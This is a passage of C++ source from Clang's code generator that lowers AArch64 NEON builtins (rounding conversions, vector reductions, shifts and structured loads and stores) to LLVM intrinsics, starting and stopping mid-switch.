case NEON::BI__builtin_neon_vcvta_s32_v:
case NEON::BI__builtin_neon_vcvtaq_s16_v:
case NEON::BI__builtin_neon_vcvtaq_s32_v:
case NEON::BI__builtin_neon_vcvta_u32_v:
case NEON::BI__builtin_neon_vcvtaq_u16_v:
case NEON::BI__builtin_neon_vcvtaq_u32_v:
case NEON::BI__builtin_neon_vcvta_s64_v:
case NEON::BI__builtin_neon_vcvtaq_s64_v:
case NEON::BI__builtin_neon_vcvta_u64_v:
case NEON::BI__builtin_neon_vcvtaq_u64_v: {
Int = usgn ? Intrinsic::aarch64_neon_fcvtau : Intrinsic::aarch64_neon_fcvtas;
llvm::Type *Tys[2] = { Ty, GetFloatNeonType(this, Type) };
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vcvta");
}
case NEON::BI__builtin_neon_vcvtm_s16_v:
case NEON::BI__builtin_neon_vcvtm_s32_v:
case NEON::BI__builtin_neon_vcvtmq_s16_v:
case NEON::BI__builtin_neon_vcvtmq_s32_v:
case NEON::BI__builtin_neon_vcvtm_u16_v:
case NEON::BI__builtin_neon_vcvtm_u32_v:
case NEON::BI__builtin_neon_vcvtmq_u16_v:
case NEON::BI__builtin_neon_vcvtmq_u32_v:
case NEON::BI__builtin_neon_vcvtm_s64_v:
case NEON::BI__builtin_neon_vcvtmq_s64_v:
case NEON::BI__builtin_neon_vcvtm_u64_v:
case NEON::BI__builtin_neon_vcvtmq_u64_v: {
Int = usgn ? Intrinsic::aarch64_neon_fcvtmu : Intrinsic::aarch64_neon_fcvtms;
llvm::Type *Tys[2] = { Ty, GetFloatNeonType(this, Type) };
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vcvtm");
}
case NEON::BI__builtin_neon_vcvtn_s16_v:
case NEON::BI__builtin_neon_vcvtn_s32_v:
case NEON::BI__builtin_neon_vcvtnq_s16_v:
case NEON::BI__builtin_neon_vcvtnq_s32_v:
case NEON::BI__builtin_neon_vcvtn_u16_v:
case NEON::BI__builtin_neon_vcvtn_u32_v:
case NEON::BI__builtin_neon_vcvtnq_u16_v:
case NEON::BI__builtin_neon_vcvtnq_u32_v:
case NEON::BI__builtin_neon_vcvtn_s64_v:
case NEON::BI__builtin_neon_vcvtnq_s64_v:
case NEON::BI__builtin_neon_vcvtn_u64_v:
case NEON::BI__builtin_neon_vcvtnq_u64_v: {
Int = usgn ? Intrinsic::aarch64_neon_fcvtnu : Intrinsic::aarch64_neon_fcvtns;
llvm::Type *Tys[2] = { Ty, GetFloatNeonType(this, Type) };
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vcvtn");
}
case NEON::BI__builtin_neon_vcvtp_s16_v:
case NEON::BI__builtin_neon_vcvtp_s32_v:
case NEON::BI__builtin_neon_vcvtpq_s16_v:
case NEON::BI__builtin_neon_vcvtpq_s32_v:
case NEON::BI__builtin_neon_vcvtp_u16_v:
case NEON::BI__builtin_neon_vcvtp_u32_v:
case NEON::BI__builtin_neon_vcvtpq_u16_v:
case NEON::BI__builtin_neon_vcvtpq_u32_v:
case NEON::BI__builtin_neon_vcvtp_s64_v:
case NEON::BI__builtin_neon_vcvtpq_s64_v:
case NEON::BI__builtin_neon_vcvtp_u64_v:
case NEON::BI__builtin_neon_vcvtpq_u64_v: {
Int = usgn ? Intrinsic::aarch64_neon_fcvtpu : Intrinsic::aarch64_neon_fcvtps;
llvm::Type *Tys[2] = { Ty, GetFloatNeonType(this, Type) };
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vcvtp");
}
case NEON::BI__builtin_neon_vmulx_v:
case NEON::BI__builtin_neon_vmulxq_v: {
Int = Intrinsic::aarch64_neon_fmulx;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vmulx");
}
case NEON::BI__builtin_neon_vmulxh_lane_f16:
case NEON::BI__builtin_neon_vmulxh_laneq_f16: {
    // vmulx_lane should be mapped to the Neon scalar mulx after extracting
    // the scalar element.
Ops.push_back(EmitScalarExpr(E->getArg(2)));
Ops[1] = Builder.CreateExtractElement(Ops[1], Ops[2], "extract");
Ops.pop_back();
Int = Intrinsic::aarch64_neon_fmulx;
return EmitNeonCall(CGM.getIntrinsic(Int, HalfTy), Ops, "vmulx");
}
case NEON::BI__builtin_neon_vmul_lane_v:
case NEON::BI__builtin_neon_vmul_laneq_v: {
// v1f64 vmul_lane should be mapped to Neon scalar mul lane
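    // Note: roughly, vmul_lane_f64(a, v, i) becomes
    //   fmul double a, extractelement(<1 x double> v, i)
    // with the scalar result bitcast back to the v1f64 return type.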
    bool Quad = BuiltinID == NEON::BI__builtin_neon_vmul_laneq_v;
Ops[0] = Builder.CreateBitCast(Ops[0], DoubleTy);
llvm::FixedVectorType *VTy =
GetNeonType(this, NeonTypeFlags(NeonTypeFlags::Float64, false, Quad));
Ops[1] = Builder.CreateBitCast(Ops[1], VTy);
Ops[1] = Builder.CreateExtractElement(Ops[1], Ops[2], "extract");
Value *Result = Builder.CreateFMul(Ops[0], Ops[1]);
return Builder.CreateBitCast(Result, Ty);
}
case NEON::BI__builtin_neon_vnegd_s64:
return Builder.CreateNeg(EmitScalarExpr(E->getArg(0)), "vnegd");
case NEON::BI__builtin_neon_vnegh_f16:
return Builder.CreateFNeg(EmitScalarExpr(E->getArg(0)), "vnegh");
case NEON::BI__builtin_neon_vpmaxnm_v:
case NEON::BI__builtin_neon_vpmaxnmq_v: {
Int = Intrinsic::aarch64_neon_fmaxnmp;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vpmaxnm");
}
case NEON::BI__builtin_neon_vpminnm_v:
case NEON::BI__builtin_neon_vpminnmq_v: {
Int = Intrinsic::aarch64_neon_fminnmp;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vpminnm");
}
case NEON::BI__builtin_neon_vsqrth_f16: {
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Int = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_sqrt
: Intrinsic::sqrt;
return EmitNeonCall(CGM.getIntrinsic(Int, HalfTy), Ops, "vsqrt");
}
case NEON::BI__builtin_neon_vsqrt_v:
case NEON::BI__builtin_neon_vsqrtq_v: {
Int = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_sqrt
: Intrinsic::sqrt;
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vsqrt");
}
case NEON::BI__builtin_neon_vrbit_v:
case NEON::BI__builtin_neon_vrbitq_v: {
Int = Intrinsic::bitreverse;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vrbit");
}
case NEON::BI__builtin_neon_vaddv_u8:
// FIXME: These are handled by the AArch64 scalar code.
usgn = true;
LLVM_FALLTHROUGH;
case NEON::BI__builtin_neon_vaddv_s8: {
Int = usgn ? Intrinsic::aarch64_neon_uaddv : Intrinsic::aarch64_neon_saddv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int8Ty, 8);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vaddv");
return Builder.CreateTrunc(Ops[0], Int8Ty);
}
case NEON::BI__builtin_neon_vaddv_u16:
usgn = true;
LLVM_FALLTHROUGH;
case NEON::BI__builtin_neon_vaddv_s16: {
Int = usgn ? Intrinsic::aarch64_neon_uaddv : Intrinsic::aarch64_neon_saddv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int16Ty, 4);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vaddv");
return Builder.CreateTrunc(Ops[0], Int16Ty);
}
case NEON::BI__builtin_neon_vaddvq_u8:
usgn = true;
LLVM_FALLTHROUGH;
case NEON::BI__builtin_neon_vaddvq_s8: {
Int = usgn ? Intrinsic::aarch64_neon_uaddv : Intrinsic::aarch64_neon_saddv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int8Ty, 16);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vaddv");
return Builder.CreateTrunc(Ops[0], Int8Ty);
}
case NEON::BI__builtin_neon_vaddvq_u16:
usgn = true;
LLVM_FALLTHROUGH;
case NEON::BI__builtin_neon_vaddvq_s16: {
Int = usgn ? Intrinsic::aarch64_neon_uaddv : Intrinsic::aarch64_neon_saddv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int16Ty, 8);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vaddv");
return Builder.CreateTrunc(Ops[0], Int16Ty);
}
case NEON::BI__builtin_neon_vmaxv_u8: {
Int = Intrinsic::aarch64_neon_umaxv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int8Ty, 8);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vmaxv");
return Builder.CreateTrunc(Ops[0], Int8Ty);
}
case NEON::BI__builtin_neon_vmaxv_u16: {
Int = Intrinsic::aarch64_neon_umaxv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int16Ty, 4);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vmaxv");
return Builder.CreateTrunc(Ops[0], Int16Ty);
}
case NEON::BI__builtin_neon_vmaxvq_u8: {
Int = Intrinsic::aarch64_neon_umaxv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int8Ty, 16);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vmaxv");
return Builder.CreateTrunc(Ops[0], Int8Ty);
}
case NEON::BI__builtin_neon_vmaxvq_u16: {
Int = Intrinsic::aarch64_neon_umaxv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int16Ty, 8);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vmaxv");
return Builder.CreateTrunc(Ops[0], Int16Ty);
}
case NEON::BI__builtin_neon_vmaxv_s8: {
Int = Intrinsic::aarch64_neon_smaxv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int8Ty, 8);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vmaxv");
return Builder.CreateTrunc(Ops[0], Int8Ty);
}
case NEON::BI__builtin_neon_vmaxv_s16: {
Int = Intrinsic::aarch64_neon_smaxv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int16Ty, 4);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vmaxv");
return Builder.CreateTrunc(Ops[0], Int16Ty);
}
case NEON::BI__builtin_neon_vmaxvq_s8: {
Int = Intrinsic::aarch64_neon_smaxv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int8Ty, 16);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vmaxv");
return Builder.CreateTrunc(Ops[0], Int8Ty);
}
case NEON::BI__builtin_neon_vmaxvq_s16: {
Int = Intrinsic::aarch64_neon_smaxv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int16Ty, 8);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vmaxv");
return Builder.CreateTrunc(Ops[0], Int16Ty);
}
case NEON::BI__builtin_neon_vmaxv_f16: {
Int = Intrinsic::aarch64_neon_fmaxv;
Ty = HalfTy;
VTy = llvm::FixedVectorType::get(HalfTy, 4);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vmaxv");
return Builder.CreateTrunc(Ops[0], HalfTy);
}
case NEON::BI__builtin_neon_vmaxvq_f16: {
Int = Intrinsic::aarch64_neon_fmaxv;
Ty = HalfTy;
VTy = llvm::FixedVectorType::get(HalfTy, 8);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vmaxv");
return Builder.CreateTrunc(Ops[0], HalfTy);
}
case NEON::BI__builtin_neon_vminv_u8: {
Int = Intrinsic::aarch64_neon_uminv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int8Ty, 8);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vminv");
return Builder.CreateTrunc(Ops[0], Int8Ty);
}
case NEON::BI__builtin_neon_vminv_u16: {
Int = Intrinsic::aarch64_neon_uminv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int16Ty, 4);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vminv");
return Builder.CreateTrunc(Ops[0], Int16Ty);
}
case NEON::BI__builtin_neon_vminvq_u8: {
Int = Intrinsic::aarch64_neon_uminv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int8Ty, 16);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vminv");
return Builder.CreateTrunc(Ops[0], Int8Ty);
}
case NEON::BI__builtin_neon_vminvq_u16: {
Int = Intrinsic::aarch64_neon_uminv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int16Ty, 8);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vminv");
return Builder.CreateTrunc(Ops[0], Int16Ty);
}
case NEON::BI__builtin_neon_vminv_s8: {
Int = Intrinsic::aarch64_neon_sminv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int8Ty, 8);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vminv");
return Builder.CreateTrunc(Ops[0], Int8Ty);
}
case NEON::BI__builtin_neon_vminv_s16: {
Int = Intrinsic::aarch64_neon_sminv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int16Ty, 4);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vminv");
return Builder.CreateTrunc(Ops[0], Int16Ty);
}
case NEON::BI__builtin_neon_vminvq_s8: {
Int = Intrinsic::aarch64_neon_sminv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int8Ty, 16);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vminv");
return Builder.CreateTrunc(Ops[0], Int8Ty);
}
case NEON::BI__builtin_neon_vminvq_s16: {
Int = Intrinsic::aarch64_neon_sminv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int16Ty, 8);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vminv");
return Builder.CreateTrunc(Ops[0], Int16Ty);
}
case NEON::BI__builtin_neon_vminv_f16: {
Int = Intrinsic::aarch64_neon_fminv;
Ty = HalfTy;
VTy = llvm::FixedVectorType::get(HalfTy, 4);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vminv");
return Builder.CreateTrunc(Ops[0], HalfTy);
}
case NEON::BI__builtin_neon_vminvq_f16: {
Int = Intrinsic::aarch64_neon_fminv;
Ty = HalfTy;
VTy = llvm::FixedVectorType::get(HalfTy, 8);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vminv");
return Builder.CreateTrunc(Ops[0], HalfTy);
}
case NEON::BI__builtin_neon_vmaxnmv_f16: {
Int = Intrinsic::aarch64_neon_fmaxnmv;
Ty = HalfTy;
VTy = llvm::FixedVectorType::get(HalfTy, 4);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vmaxnmv");
return Builder.CreateTrunc(Ops[0], HalfTy);
}
case NEON::BI__builtin_neon_vmaxnmvq_f16: {
Int = Intrinsic::aarch64_neon_fmaxnmv;
Ty = HalfTy;
VTy = llvm::FixedVectorType::get(HalfTy, 8);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vmaxnmv");
return Builder.CreateTrunc(Ops[0], HalfTy);
}
case NEON::BI__builtin_neon_vminnmv_f16: {
Int = Intrinsic::aarch64_neon_fminnmv;
Ty = HalfTy;
VTy = llvm::FixedVectorType::get(HalfTy, 4);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vminnmv");
return Builder.CreateTrunc(Ops[0], HalfTy);
}
case NEON::BI__builtin_neon_vminnmvq_f16: {
Int = Intrinsic::aarch64_neon_fminnmv;
Ty = HalfTy;
VTy = llvm::FixedVectorType::get(HalfTy, 8);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vminnmv");
return Builder.CreateTrunc(Ops[0], HalfTy);
}
case NEON::BI__builtin_neon_vmul_n_f64: {
Ops[0] = Builder.CreateBitCast(Ops[0], DoubleTy);
Value *RHS = Builder.CreateBitCast(EmitScalarExpr(E->getArg(1)), DoubleTy);
return Builder.CreateFMul(Ops[0], RHS);
}
case NEON::BI__builtin_neon_vaddlv_u8: {
Int = Intrinsic::aarch64_neon_uaddlv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int8Ty, 8);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vaddlv");
return Builder.CreateTrunc(Ops[0], Int16Ty);
}
case NEON::BI__builtin_neon_vaddlv_u16: {
Int = Intrinsic::aarch64_neon_uaddlv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int16Ty, 4);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vaddlv");
}
case NEON::BI__builtin_neon_vaddlvq_u8: {
Int = Intrinsic::aarch64_neon_uaddlv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int8Ty, 16);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vaddlv");
return Builder.CreateTrunc(Ops[0], Int16Ty);
}
case NEON::BI__builtin_neon_vaddlvq_u16: {
Int = Intrinsic::aarch64_neon_uaddlv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int16Ty, 8);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vaddlv");
}
case NEON::BI__builtin_neon_vaddlv_s8: {
Int = Intrinsic::aarch64_neon_saddlv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int8Ty, 8);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vaddlv");
return Builder.CreateTrunc(Ops[0], Int16Ty);
}
case NEON::BI__builtin_neon_vaddlv_s16: {
Int = Intrinsic::aarch64_neon_saddlv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int16Ty, 4);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vaddlv");
}
case NEON::BI__builtin_neon_vaddlvq_s8: {
Int = Intrinsic::aarch64_neon_saddlv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int8Ty, 16);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vaddlv");
return Builder.CreateTrunc(Ops[0], Int16Ty);
}
case NEON::BI__builtin_neon_vaddlvq_s16: {
Int = Intrinsic::aarch64_neon_saddlv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int16Ty, 8);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vaddlv");
}
case NEON::BI__builtin_neon_vsri_n_v:
case NEON::BI__builtin_neon_vsriq_n_v: {
Int = Intrinsic::aarch64_neon_vsri;
llvm::Function *Intrin = CGM.getIntrinsic(Int, Ty);
return EmitNeonCall(Intrin, Ops, "vsri_n");
}
case NEON::BI__builtin_neon_vsli_n_v:
case NEON::BI__builtin_neon_vsliq_n_v: {
Int = Intrinsic::aarch64_neon_vsli;
llvm::Function *Intrin = CGM.getIntrinsic(Int, Ty);
return EmitNeonCall(Intrin, Ops, "vsli_n");
}
case NEON::BI__builtin_neon_vsra_n_v:
case NEON::BI__builtin_neon_vsraq_n_v:
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
Ops[1] = EmitNeonRShiftImm(Ops[1], Ops[2], Ty, usgn, "vsra_n");
return Builder.CreateAdd(Ops[0], Ops[1]);
case NEON::BI__builtin_neon_vrsra_n_v:
case NEON::BI__builtin_neon_vrsraq_n_v: {
Int = usgn ? Intrinsic::aarch64_neon_urshl : Intrinsic::aarch64_neon_srshl;
    SmallVector<llvm::Value *, 2> TmpOps;
TmpOps.push_back(Ops[1]);
TmpOps.push_back(Ops[2]);
Function* F = CGM.getIntrinsic(Int, Ty);
llvm::Value *tmp = EmitNeonCall(F, TmpOps, "vrshr_n", 1, true);
Ops[0] = Builder.CreateBitCast(Ops[0], VTy);
return Builder.CreateAdd(Ops[0], tmp);
}
case NEON::BI__builtin_neon_vld1_v:
case NEON::BI__builtin_neon_vld1q_v: {
Ops[0] = Builder.CreateBitCast(Ops[0], llvm::PointerType::getUnqual(VTy));
return Builder.CreateAlignedLoad(VTy, Ops[0], PtrOp0.getAlignment());
}
case NEON::BI__builtin_neon_vst1_v:
case NEON::BI__builtin_neon_vst1q_v:
Ops[0] = Builder.CreateBitCast(Ops[0], llvm::PointerType::getUnqual(VTy));
Ops[1] = Builder.CreateBitCast(Ops[1], VTy);
return Builder.CreateAlignedStore(Ops[1], Ops[0], PtrOp0.getAlignment());
case NEON::BI__builtin_neon_vld1_lane_v:
case NEON::BI__builtin_neon_vld1q_lane_v: {
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
Ty = llvm::PointerType::getUnqual(VTy->getElementType());
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
Ops[0] = Builder.CreateAlignedLoad(VTy->getElementType(), Ops[0],
PtrOp0.getAlignment());
return Builder.CreateInsertElement(Ops[1], Ops[0], Ops[2], "vld1_lane");
}
case NEON::BI__builtin_neon_vld1_dup_v:
case NEON::BI__builtin_neon_vld1q_dup_v: {
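    // Note: a dup-load is built from first principles: load the scalar,
    // insert it into lane 0 of an undef vector, then splat it across all
    // lanes with a shuffle. The backend can match this sequence to LD1R.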
Value *V = UndefValue::get(Ty);
Ty = llvm::PointerType::getUnqual(VTy->getElementType());
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
Ops[0] = Builder.CreateAlignedLoad(VTy->getElementType(), Ops[0],
PtrOp0.getAlignment());
llvm::Constant *CI = ConstantInt::get(Int32Ty, 0);
Ops[0] = Builder.CreateInsertElement(V, Ops[0], CI);
return EmitNeonSplat(Ops[0], CI);
}
case NEON::BI__builtin_neon_vst1_lane_v:
case NEON::BI__builtin_neon_vst1q_lane_v:
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
Ops[1] = Builder.CreateExtractElement(Ops[1], Ops[2]);
Ty = llvm::PointerType::getUnqual(Ops[1]->getType());
return Builder.CreateAlignedStore(Ops[1], Builder.CreateBitCast(Ops[0], Ty),
PtrOp0.getAlignment());
case NEON::BI__builtin_neon_vld2_v:
case NEON::BI__builtin_neon_vld2q_v: {
llvm::Type *PTy = llvm::PointerType::getUnqual(VTy);
Ops[1] = Builder.CreateBitCast(Ops[1], PTy);
llvm::Type *Tys[2] = { VTy, PTy };
Function *F = CGM.getIntrinsic(Intrinsic::aarch64_neon_ld2, Tys);
Ops[1] = Builder.CreateCall(F, Ops[1], "vld2");
Ops[0] = Builder.CreateBitCast(Ops[0],
llvm::PointerType::getUnqual(Ops[1]->getType()));
return Builder.CreateDefaultAlignedStore(Ops[1], Ops[0]);
}
case NEON::BI__builtin_neon_vld3_v:
case NEON::BI__builtin_neon_vld3q_v: {
llvm::Type *PTy = llvm::PointerType::getUnqual(VTy);
Ops[1] = Builder.CreateBitCast(Ops[1], PTy);
llvm::Type *Tys[2] = { VTy, PTy };
Function *F = CGM.getIntrinsic(Intrinsic::aarch64_neon_ld3, Tys);
Ops[1] = Builder.CreateCall(F, Ops[1], "vld3");
Ops[0] = Builder.CreateBitCast(Ops[0],
llvm::PointerType::getUnqual(Ops[1]->getType()));
return Builder.CreateDefaultAlignedStore(Ops[1], Ops[0]);
}
case NEON::BI__builtin_neon_vld4_v:
case NEON::BI__builtin_neon_vld4q_v: {
llvm::Type *PTy = llvm::PointerType::getUnqual(VTy);
Ops[1] = Builder.CreateBitCast(Ops[1], PTy);
llvm::Type *Tys[2] = { VTy, PTy };
Function *F = CGM.getIntrinsic(Intrinsic::aarch64_neon_ld4, Tys);
Ops[1] = Builder.CreateCall(F, Ops[1], "vld4");
Ops[0] = Builder.CreateBitCast(Ops[0],
llvm::PointerType::getUnqual(Ops[1]->getType()));
return Builder.CreateDefaultAlignedStore(Ops[1], Ops[0]);
}
case NEON::BI__builtin_neon_vld2_dup_v:
case NEON::BI__builtin_neon_vld2q_dup_v: {
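// The ldNr ("load and replicate") intrinsics load a single structure and
// broadcast it to every lane; the store-through-sret pattern matches vldN
// above.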
llvm::Type *PTy =
llvm::PointerType::getUnqual(VTy->getElementType());
Ops[1] = Builder.CreateBitCast(Ops[1], PTy);
llvm::Type *Tys[2] = { VTy, PTy };
Function *F = CGM.getIntrinsic(Intrinsic::aarch64_neon_ld2r, Tys);
Ops[1] = Builder.CreateCall(F, Ops[1], "vld2");
Ops[0] = Builder.CreateBitCast(Ops[0],
llvm::PointerType::getUnqual(Ops[1]->getType()));
return Builder.CreateDefaultAlignedStore(Ops[1], Ops[0]);
}
case NEON::BI__builtin_neon_vld3_dup_v:
case NEON::BI__builtin_neon_vld3q_dup_v: {
llvm::Type *PTy =
llvm::PointerType::getUnqual(VTy->getElementType());
Ops[1] = Builder.CreateBitCast(Ops[1], PTy);
llvm::Type *Tys[2] = { VTy, PTy };
Function *F = CGM.getIntrinsic(Intrinsic::aarch64_neon_ld3r, Tys);
Ops[1] = Builder.CreateCall(F, Ops[1], "vld3");
Ops[0] = Builder.CreateBitCast(Ops[0],
llvm::PointerType::getUnqual(Ops[1]->getType()));
return Builder.CreateDefaultAlignedStore(Ops[1], Ops[0]);
}
case NEON::BI__builtin_neon_vld4_dup_v:
case NEON::BI__builtin_neon_vld4q_dup_v: {
llvm::Type *PTy =
llvm::PointerType::getUnqual(VTy->getElementType());
Ops[1] = Builder.CreateBitCast(Ops[1], PTy);
llvm::Type *Tys[2] = { VTy, PTy };
